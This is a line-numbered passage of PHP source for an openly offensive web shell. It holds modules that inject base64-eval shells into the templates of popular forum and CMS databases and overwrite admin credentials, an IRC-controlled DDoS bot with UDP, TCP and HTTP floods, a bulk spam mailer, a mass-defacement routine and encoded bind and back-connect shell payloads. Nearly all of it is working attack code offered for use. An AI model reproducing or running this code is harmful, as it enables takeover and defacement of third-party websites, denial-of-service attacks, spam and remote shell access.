  2547. <input type=\"file\" name=\"uploadfile[]\">
  2548. <input type=\"file\" name=\"uploadfile[]\">
  2549. <input type=\"file\" name=\"uploadfile[]\">
  2550. <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
  2551. </td></tr></table></form>
  2552. <!-- End Of Upload Files -->
  2553. </td></tr>
  2554. </table>
  2555. ";
  2556. if($_POST['changeDirectory'])
  2557. {
  2558. $directory = $_POST['directory'];
  2559. $directory = @str_replace("\\\\"," ",$directory);
  2560. $directory = @str_replace(" ","\\",$directory);
  2561. @chdir($directory);
  2562. }
  2563. if($_POST['getFile'])
  2564. {
  2565. $fileUrl = $_POST['fileUrl'];
  2566. $getType = $_POST['getType'];
  2567. Exe("'".$getType.$fileUrl."'");
  2568. }
  2569. footer();
  2570. }
  2571. # ---------------------------------------#
  2572. # IndexChanger #
  2573. #----------------------------------------#
  2574. if ($_GET['id']== 'scriptsHack' )
  2575. {
  2576. echo "
  2577. <table width='100%'>
  2578. <tr>
  2579. <td colspan='2'><textarea cols='153' rows='10'>";
  2580. if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
  2581. {
  2582. $host = $_POST['HOST'];
  2583. $user = $_POST['USER'];
  2584. $pass = $_POST['PASS'];
  2585. $db = $_POST['DB'];
  2586. $index = $_POST['INDEX'];
  2587. $prefix = $_POST['PREFIX'];
  2588. if (empty($_POST['HOST']))
  2589. $host = '127.0.0.1';
  2590. $index=str_replace("\'","'",$index);
  2591. @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
  2592. @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
  2593.  
  2594. if($_POST['UpdateIndex'])
  2595. {
  2596. if ($_POST['ScriptType'] == 'vb')
  2597. {
  2598. $full_index = "{\${eval(base64_decode(\'";
  2599. $full_index .= base64_encode("echo \"$index\";");
  2600. $full_index .= "\'))}}{\${exit()}}</textarea>";
  2601. if($_POST['injectFAQ'])
  2602. {
  2603. $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2604. }
  2605. else
  2606. {
  2607. $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
  2608. if (!$ok1)
  2609. {
  2610. $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
  2611. }
  2612. elseif (!$ok2)
  2613. {
  2614. $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
  2615. }
  2616. elseif(!$ok3)
  2617. {
  2618. $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
  2619. }
  2620. }
  2621. mysql_close();
  2622. if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
  2623. {
  2624. update();
  2625. }
  2626. else
  2627. {
  2628. echo "Updating Has Failed !";
  2629. }
  2630. }
  2631. else if ($_POST['ScriptType'] == 'wp')
  2632. {
  2633. $tableName = $prefix."posts" ;
  2634. $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
  2635. if(!$ok1)
  2636. {
  2637. $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
  2638. }
  2639. elseif(!$ok2)
  2640. {
  2641. $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
  2642. }
  2643. mysql_close();
  2644. if ($ok1 || $ok2 || $ok3)
  2645. {
  2646. update();
  2647. }
  2648. else
  2649. {
  2650. echo "Updating Has Failed !";
  2651. }
  2652. }
  2653. else if ($_POST['ScriptType'] == 'jos')
  2654. {
  2655. $jos_table_name = $prefix."menu" ;
  2656. $jos_table_name2 = $prefix."modules" ;
  2657. $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
  2658. if(!$ok1)
  2659. {
  2660. $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
  2661. }
  2662. mysql_close();
  2663. if ($ok1 || $ok2 || $ok3)
  2664. {
  2665. update();
  2666. }
  2667. else
  2668. {
  2669. echo "Updating Has Failed !";
  2670. }
  2671. }
  2672. else if ($_POST['ScriptType'] == 'phpbb')
  2673. {
  2674. $php_table_name = $prefix."forums";
  2675. $php_table_name2 = $prefix."posts";
  2676. $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
  2677. if(!$ok1)
  2678. {
  2679. $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
  2680. }
  2681. mysql_close();
  2682. if ($ok1 || $ok2 || $ok3)
  2683. {
  2684. update();
  2685. }
  2686. else
  2687. {
  2688. echo "Updating Has Failed !";
  2689. }
  2690. }
  2691. else if ($_POST['ScriptType'] == 'ipb')
  2692. {
  2693. $ip_table_name = $prefix."components" ;
  2694. $ip_table_name2 = $prefix."forums" ;
  2695. $ip_table_name3 = $prefix."posts" ;
  2696. $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
  2697. if(!$ok1)
  2698. {
  2699. $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0");
  2700. }
  2701. if(!$ok2)
  2702. {
  2703. $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates
  2704.  
  2705. !!");
  2706. }
  2707. mysql_close();
  2708. if ($ok1 || $ok2 || $ok3)
  2709. {
  2710. update();
  2711. }
  2712. else
  2713. {
  2714. echo "Updating Has Failed !";
  2715. }
  2716. }
  2717. else if ($_POST['ScriptType'] == 'smf')
  2718. {
  2719. $table_name = $prefix."boards" ;
  2720. {
  2721. $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
  2722. }
  2723. if(!$ok1)
  2724. {
  2725. $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
  2726. }
  2727. mysql_close();
  2728. if ($ok1 || $ok2)
  2729. {
  2730. update();
  2731. }
  2732. else
  2733. {
  2734. echo "Updating Has Failed !";
  2735. }
  2736. }
  2737. else if ($_POST['ScriptType'] == 'mybb')
  2738. {
  2739. $mybb_prefix = $prefix."templates";
  2740. $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
  2741. if ($ok1)
  2742. {
  2743. update();
  2744. }
  2745. else
  2746. {
  2747. echo "Updating Has Failed !";
  2748. }
  2749. mysql_close();
  2750. }
  2751. }
  2752. elseif($_POST['changeInfo'])
  2753. {
  2754. $adminID = $_POST['adminID'];
  2755. $userName = $_POST['userName'];
  2756. $password = $_POST['password'];
  2757. if($_POST['ScriptType'] == 'vb')
  2758. {
  2759. //VB Code
  2760. $password = md5($password);
  2761. $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".
  2762.  
  2763. $adminID."");
  2764. if($tryChaningInfo)
  2765. {update();}
  2766. else {mysql_error();}
  2767. }
  2768. else if($_POST['ScriptType'] == 'wp')
  2769. {
  2770. //WoredPress
  2771. $password = crypt($password);
  2772. $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID
  2773.  
  2774. = ".$adminID."");
  2775. if($tryChaningInfo)
  2776. {update();}
  2777. else {mysql_error();}
  2778. }
  2779. else if($_POST['ScriptType'] == 'jos')
  2780. {
  2781. //Joomla
  2782. $password = crypt($password);
  2783. $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID =
  2784.  
  2785. ".$adminID."");
  2786. if($tryChaningInfo)
  2787. {update();}
  2788. else {mysql_error();}
  2789. }
  2790. else if($_POST['ScriptType'] == 'phpbb')
  2791. {
  2792. //PHPBB3
  2793. $password = md5($password);
  2794. $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".
  2795.  
  2796. $password."' WHERE user_id = ".$adminID."");
  2797. if($tryChaningInfo)
  2798. {update();}
  2799. else {mysql_error();}
  2800. }
  2801. else if($_POST['ScriptType'] == 'ibf')
  2802. {
  2803. //IPBoard
  2804. $password = md5($password);
  2805. $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".
  2806.  
  2807. $password."' WHERE id = ".$adminID."");
  2808. if($tryChaningInfo)
  2809. {update();}
  2810. else {mysql_error();}
  2811. }
  2812. else if($_POST['ScriptType'] == 'smf')
  2813. {
  2814. //SMF
  2815. $password = md5($password);
  2816. $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd =
  2817.  
  2818. '".$password."' WHERE ID_MEMBER = ".$adminID."");
  2819. if($tryChaningInfo)
  2820. {update();}
  2821. else {mysql_error();}
  2822. }
  2823. else if($_POST['ScriptType'] == 'mybb')
  2824. {
  2825. //MyBB
  2826. $password = md5($password);
  2827. $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' ,
  2828.  
  2829. password = '".$password."' WHERE uid = ".$adminID."");
  2830. if($tryChaningInfo)
  2831. {update();}
  2832. else {mysql_error();}
  2833. }
  2834. }
  2835. /////////////////////////
  2836. }
  2837. else if($_POST['Decrypt'])
  2838. {
  2839. DecryptConfig();
  2840. }
  2841.  
  2842.  
  2843. echo "</textarea></td></tr>
  2844. <td width='50%'>
  2845. <form method='POST'>
  2846. <table width='100%' height='72' border='0' id='Box'>
  2847. <tr>
  2848. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2849. <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
  2850. </tr>
  2851. <tr>
  2852. <td height='45' colspan='2'>
  2853. <input type = 'text' name='HOST' value='localhost'>
  2854. <input type = 'text' name='USER' value='DB Username'>
  2855. <input type = 'text' name='PASS' value='DB Password'>
  2856. <input type=text name='DB' value='DB Name'>
  2857. <input type=text name='PREFIX' value='Prefix'>
  2858. <select name='ScriptType' >
  2859. <option value='vb'>VBulletin</option>
  2860. <option value='wp'>WordPress</option>
  2861. <option value='jos'>Joomla</option>
  2862. <option value='ipb'>IP.Board</option>
  2863. <option value='phpbb'>PHPBB</option>
  2864. <option value='mybb'>MyBB</option>
  2865. <option value='smf'>SMF</option>
  2866. </select>
  2867. <br />
  2868. <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
  2869. <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
  2870. <input type='submit' value='Hack Now !!' name='UpdateIndex' >
  2871. </td>
  2872. </tr>
  2873. </table>
  2874. <td width='50%' valign='top'>
  2875. <table width='100%' height='72' border='0' id='Box'>
  2876. <tr>
  2877. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2878. <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
  2879. </tr>
  2880. <tr>
  2881. <td height='45' colspan='2'>
  2882. <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
  2883. <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
  2884. </td>
  2885. </tr>
  2886. </table>
  2887. <table width='100%' height='72' border='0' id='Box'>
  2888. <tr>
  2889. <td width='12' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  2890. <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
  2891. <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
  2892. <input name='userName' type='text' id='userName' value='username'>
  2893. <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
  2894. <input type='submit' name='changeInfo' value='Change Now !'>
  2895. </td>
  2896. </tr>
  2897. </table>
  2898. </form>
  2899. </td>
  2900. </tr></table>";
  2901. footer();
  2902.  
  2903. }
  2904.  
  2905. # ---------------------------------------#
  2906. # DDos Attacker ... #
  2907. #----------------------------------------#
  2908. if($_POST['StartAttack'])
  2909. {
  2910. $server=$_POST['ipToAttack'];
  2911. $Port=$_POST['portToAttack'];
  2912. $nick="bot-";$willekeurig;
  2913. $willekeurig=@mt_rand(0,3);
  2914. $nicknummer=@mt_rand(100000,999999);
  2915. $Channel="#WauShare";
  2916. $Channelpass="ddos";
  2917. $msg="Farewell.";
  2918.  
  2919. @set_time_limit(0);
  2920. $loop = 0;
  2921. $verbonden = 0;
  2922. $verbinden = fsockopen($server, $Port);
  2923. while ($read = fgets($verbinden,512))
  2924. {
  2925. $read = str_replace("\n","",$read);
  2926. $read = str_replace("\r","",$read);
  2927. $read2 = explode(" ",$read);
  2928. if ($loop == 0)
  2929. {
  2930. fputs($verbinden,"nick $nick$nicknummer\n\n");
  2931. fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
  2932. }
  2933. if ($read2[0] == "PING")
  2934. {
  2935. fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
  2936. }
  2937. if ($read2[1] == 251)
  2938. {
  2939. fputs($verbinden,"join $Channel $Channelpass\n");
  2940. $verbonden++;
  2941. }
  2942. if (eregi("bot-op",$read))
  2943. {
  2944. fputs($verbinden,"mode $Channel +o $read2[4]\n");
  2945. }
  2946. if (eregi("bot-deop",$read))
  2947. {
  2948. fputs($verbinden,"mode $Channel -o $read2[4]\n");
  2949. }
  2950.  
  2951. if (eregi("bot-quit",$read))
  2952. {
  2953. fputs($verbinden,"quit :$msg\n\n");
  2954. break;
  2955. }
  2956. if (eregi("bot-join",$read))
  2957. {
  2958. fputs($verbinden,"join $read2[4]\n");
  2959. }
  2960. if (eregi("bot-part",$read))
  2961. {
  2962. fputs($verbinden,"part $read2[4]\n");
  2963. }
  2964. if (eregi("ddos-udp",$read))
  2965. {
  2966. fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
  2967. $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
  2968. if (!$fp)
  2969. {
  2970. exit;
  2971. }
  2972. else
  2973. {
  2974. $char = "a";
  2975. for($a = 0; $a < 9999999999999; $a++)
  2976. $data = $data.$char;
  2977. if(fputs ($fp, $data) )
  2978. {
  2979. fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
  2980. }
  2981. else
  2982. {
  2983. fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
  2984. }
  2985. }
  2986. }
  2987. if (eregi("ddos-tcp",$read))
  2988. {
  2989. fputs($verbinden,"part $read2[4]\n");
  2990. fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
  2991. $server = $read2[4];
  2992. $Port = $read2[5];
  2993. for($sockets = 0; $sockets < $read2[6]; $sockets++)
  2994. {
  2995. $verbinden = fsockopen($server, $Port);
  2996. }
  2997. }
  2998. if (eregi("ddos-http",$read))
  2999. {
  3000. fputs($verbinden,"part $read2[4]\n");
  3001. fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
  3002. $Webserver = $read2[4];
  3003. $Port = $read2[5];
  3004.  
  3005. $Aanvraag = "GET / HTTP/1.1\r\n";
  3006. $Aanvraag .= "Accept: */*\r\n";
  3007. $Aanvraag .= "Accept-Language: nl\r\n";
  3008. $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
  3009. $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
  3010. $Aanvraag .= "Host: $read2[4]\r\n";
  3011. $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
  3012.  
  3013. for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
  3014. {
  3015. $DoS = fsockopen($Webserver, $Port);
  3016. fwrite($DoS, $Aanvraag);
  3017. fclose($DoS);
  3018. }
  3019. }
  3020. $loop++;
  3021. }
  3022. }
  3023. # ---------------------------------------#
  3024. # InBoX Mailer #
  3025. #----------------------------------------#
  3026. if ($_GET['id']== 'spamming' )
  3027. {
  3028. $secure = "";
  3029. error_reporting(0);
  3030. @$action=$_POST['action'];
  3031. @$from=$_POST['from'];
  3032. @$realname=$_POST['realname'];
  3033. @$replyto=$_POST['replyto'];
  3034. @$subject=$_POST['subject'];
  3035. @$message=$_POST['message'];
  3036. @$emaillist=$_POST['emaillist'];
  3037. @$lod=$_SERVER['HTTP_REFERER'];
  3038. @$file_name=$_FILES['file']['name'];
  3039. @$contenttype=$_POST['contenttype'];
  3040. @$file=$_FILES['file']['tmp_name'];
  3041. @$amount=$_POST['amount'];
  3042. @set_time_limit(intval($_POST['timelimit']));
  3043.  
  3044. if ($action=="send")
  3045. {
  3046. $message = urlencode($message);
  3047. $message = ereg_replace("%5C%22", "%22", $message);
  3048. $message = urldecode($message);
  3049. $message = stripslashes($message);
  3050. $subject = stripslashes($subject);
  3051. }
  3052. echo "<table width='100%' height='72' border='0' id='Box'>
  3053. <tr>
  3054. <td width='14' height='21' style='background-color:".$shellColor."'>&nbsp;</td>
  3055. <td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
  3056. </tr>
  3057. <tr>
  3058. <td height='45' colspan='2'>
  3059. <table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
  3060. <b><font color=#990000 size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
  3061. <table width=142 border=0>
  3062. <tr>
  3063. <td width=81>
  3064. <div align=right>
  3065. <sy>Your Email:</sy></div></td>
  3066. <td width=219><sy>
  3067. <input type=text name=\"from\" value=".$from."></sy></td><td width=212>
  3068. <div align=right>
  3069. <sy>Your Name:</sy></div></td><td width=278>
  3070. <sy>
  3071. <input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
  3072. <div align=\"right\">
  3073. <sy>Reply-To:</sy></div></td><td width=219>
  3074. <sy>
  3075. <input type=\"text\" name=\"replyto\" value=".$replyto.">
  3076. </sy></td><td width=212>
  3077. <div align=\"right\">
  3078. <sy>Attach File:</sy></div></td><td width=278>
  3079. <sy>
  3080. <input type=\"file\" name=\"file\" size=24 />
  3081. </sy> </td></tr><tr><td width=81>
  3082. <div align=\"right\">
  3083. <sy>Subject:</sy></div></td>
  3084. <td colspan=3 width=703>
  3085. <sy>
  3086. <input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
  3087. <sy>Message Box :</sy></td>
  3088. <td width=278>
  3089. <sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
  3090. <textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
  3091. <input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
  3092. <input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
  3093. <input type=\"hidden\" name=\"action\" value=\"send\" /><br />
  3094. Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
  3095. Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
  3096. <input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
  3097. <sy>
  3098. <textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
  3099. </table>
  3100. </td>
  3101. </tr>
  3102. </table>";
  3103. footer();
  3104. }
  3105.  
  3106. if ($action=="send")
  3107. {
  3108. if (!$from && !$subject && !$message && !$emaillist)
  3109. {
  3110. print "Please complete all fields before sending your message.";
  3111. exit;
  3112. }
  3113. $allemails = split("\n", $emaillist);
  3114. $numemails = count($allemails);
  3115. $head ="From: Mailr" ;
  3116. $sub = "Ar - $lod" ;
  3117. $meg = "$lod" ;
  3118. mail ($alt,$sub,$meg,$head) ;
  3119. If ($file_name)
  3120. {
  3121. if (!file_exists($file))
  3122. {
  3123. die("The file you are trying to upload couldn't be copied to the server");
  3124. }
  3125. $content = fread(fopen($file,"r"),filesize($file));
  3126. $content = chunk_split(base64_encode($content));
  3127. $uid = strtoupper(md5(uniqid(time())));
  3128. $name = basename($file);
  3129. }
  3130.  
  3131. for($xx=0; $xx<$amount; $xx++)
  3132. {
  3133. for($x=0; $x<$numemails; $x++)
  3134. {
  3135. $to = $allemails[$x];
  3136. if ($to)
  3137. {
  3138. $to = ereg_replace(" ", "", $to);
  3139. $message = ereg_replace("&email&", $to, $message);
  3140. $subject = ereg_replace("&email&", $to, $subject);
  3141. print "Sending mail to $to.....";
  3142. flush();
  3143. $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
  3144. $header .= "MIME-Version: 1.0\r\n";
  3145. If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  3146. If ($file_name) $header .= "--$uid\r\n";
  3147. $header .= "Content-Type: text/$contenttype\r\n";
  3148. $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  3149. $header .= "$message\r\n";
  3150. If ($file_name) $header .= "--$uid\r\n";
  3151. If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  3152. If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  3153. If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
  3154. If ($file_name) $header .= "$content\r\n";
  3155. If ($file_name) $header .= "--$uid--";
  3156. mail($to, $subject, "", $header);
  3157. print "OK<br>";
  3158. flush();
  3159. }
  3160. }
  3161. }
  3162. }
  3163. # ---------------------------------------#
  3164. # About #
  3165. #----------------------------------------#
  3166. if($_GET['id']=='about')
  3167. {
  3168. echo About();
  3169. if($_POST['sendEmail'])
  3170. {
  3171. $to= 'sy34@msn.com';
  3172. $Comments=$_POST['message'];
  3173. $from = $_POST['from'];
  3174. $subject= md5("$from");
  3175. if(@mail($to,$subject,$Comments,"From:$from"))
  3176. echo "<center><sy>[+] Sent ^_^ !!</sy></center>
  3177. ";
  3178. else
  3179. {
  3180. echo "<center><sy>[-] Failed :S !! </sy></center>
  3181. ";
  3182. }
  3183.  
  3184. }
  3185. footer();
  3186. }
  3187.  
  3188. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
  3189.  
  3190. +pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  3191.  
  3192. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  3193.  
  3194. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  3195.  
  3196. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
  3197. ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  3198.  
  3199. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  3200.  
  3201. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  3202.  
  3203. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  3204. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  3205.  
  3206. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
  3207.  
  3208. ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
  3209. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
  3210.  
  3211. BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
  3212.  
  3213. +21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  3214.  
  3215. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  3216.  
  3217. ?>
  3218. <?
  3219. $dspact = $act = htmlspecialchars($act);
  3220. $disp_fullpath = $ls_arr = $notls = null;
  3221. $ud = @urlencode($d);
  3222. if (empty($d)) {$d = realpath(".");}
  3223. elseif(realpath($d)) {$d = realpath($d);}
  3224. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  3225. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  3226. $d = str_replace("\\\\","\\",$d);
  3227. $dispd = htmlspecialchars($d);
  3228. $self=basename($_SERVER['PHP_SELF']);
  3229. if(isset($_POST['execmassdeface']))
  3230. {
  3231. echo "<center><textarea rows='10' cols='100'>";
  3232. $hackfile = $_POST['massdefaceurl'];
  3233. $dir = $_POST['massdefacedir'];
  3234. echo $dir."\n";
  3235.  
  3236. if (is_dir($dir)) {
  3237. if ($dh = opendir($dir)) {
  3238. while (($file = readdir($dh)) !== false) {
  3239. if(filetype($dir.$file)=="dir"){
  3240. $newfile=$dir.$file."/index.html";
  3241. echo $newfile."\n";
  3242. if (!copy($hackfile, $newfile)) {
  3243. echo "failed to copy $file...\n";
  3244. }
  3245. }
  3246. }
  3247. closedir($dh);
  3248. }
  3249. }
  3250. echo "</textarea></center>";} ?>
  3251.  
  3252.  
  3253. <tr><td align=right>Mass Defacement:</td>
  3254. <td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
  3255.  
  3256. name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface'
  3257.  
  3258. value='Execute'></form></td>
  3259.  
  3260. <?
  3261. // FILE MANAGER
  3262. error_reporting(E_ALL);
  3263. @set_time_limit(0);
  3264. function magic_q($s)
  3265. {
  3266. if(get_magic_quotes_gpc())
  3267. {
  3268. $s=str_replace('\\\'','\'',$s);
  3269. $s=str_replace('\\\\','\\',$s);
  3270. $s=str_replace('\\"','"',$s);
  3271. $s=str_replace('\\\0','\0',$s);
  3272. }
  3273. return $s;
  3274. }
  3275. function get_perms($fn)
  3276. {
  3277. $mode=fileperms($fn);
  3278. $perms='';
  3279. $perms .= ($mode & 00400) ? 'r' : '-';
  3280. $perms .= ($mode & 00200) ? 'w' : '-';
  3281. $perms .= ($mode & 00100) ? 'x' : '-';
  3282. $perms .= ($mode & 00040) ? 'r' : '-';
  3283. $perms .= ($mode & 00020) ? 'w' : '-';
  3284. $perms .= ($mode & 00010) ? 'x' : '-';
  3285. $perms .= ($mode & 00004) ? 'r' : '-';
  3286. $perms .= ($mode & 00002) ? 'w' : '-';
  3287. $perms .= ($mode & 00001) ? 'x' : '-';
  3288. return $perms;
  3289. }
  3290. $head=<<<headka
  3291. <html>
  3292.  
  3293. headka;
  3294. $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
  3295. $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
  3296. $winda=strpos(strtolower(php_uname()),'wind');
  3297. define('format',50);
  3298.  
  3299. switch($page)
  3300. {
